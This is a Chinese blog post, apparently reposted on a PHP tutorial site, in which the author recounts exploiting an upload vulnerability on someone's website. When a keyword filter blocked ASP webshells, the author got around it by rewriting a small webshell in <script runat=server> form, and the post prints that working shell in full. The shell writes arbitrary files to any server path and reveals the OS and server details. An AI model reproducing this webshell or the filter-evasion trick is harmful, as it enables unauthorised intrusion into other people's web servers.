网站地图    收藏   

主页 > 后端 > 网站安全 >

突破一流监控上传小马 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:46 作者: 阅读:

[导读] by:闷豆今 看了一个站。 有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置...

 

by:闷豆

 

今 看了一个站。 有上传漏洞

 

但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。

 

判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是web 大马等上面的关键词。

 

只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。

 

上传测试。

 

发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。= =|||

 

他竟然直接判断是否存在<%%> 这是所有asp都存在的= =!! 需要传能解析的asp.

 

怎么能少了<%%>呢?

 

如何突破呢? 我翻我的一句话的时候看到了一个东西。

 

如下:

 

//不需要用到<%%>

 

这不就是一般的script的书写方式么。 然后这玩意给了我灵感。

 

我去把一个小马修改为这种方式。

 

结果上传成功了。 也没被过滤了。 哈哈。

 

Code:

 

<script language=VBScript runat=server>

dim da

set fso=server.createobject("scripting.filesystemobject")

path=request("path")

if path<>"" then

data=request("da")

set da=fso.createtextfile(path,true)

da.write data

if err=0 then

Response.Write "yes"

else

Response.Write "no"

end if

err.clear

end if

set da=nothing

set fos=nothing

Response.Write "<form action='' method=post>"

Response.Write "<input type=text name=path>"

Response.Write "<br>"

Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))

Response.Write "<br>"

Response.Write "操作系统为:"&Request.ServerVariables("OS")

Response.Write "<br>"

Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")

Response.Write "<br>"

Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"

Response.Write "<br>"

Response.Write "<input type=submit value=save>"

Response.Write "</form>"

</Script>

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论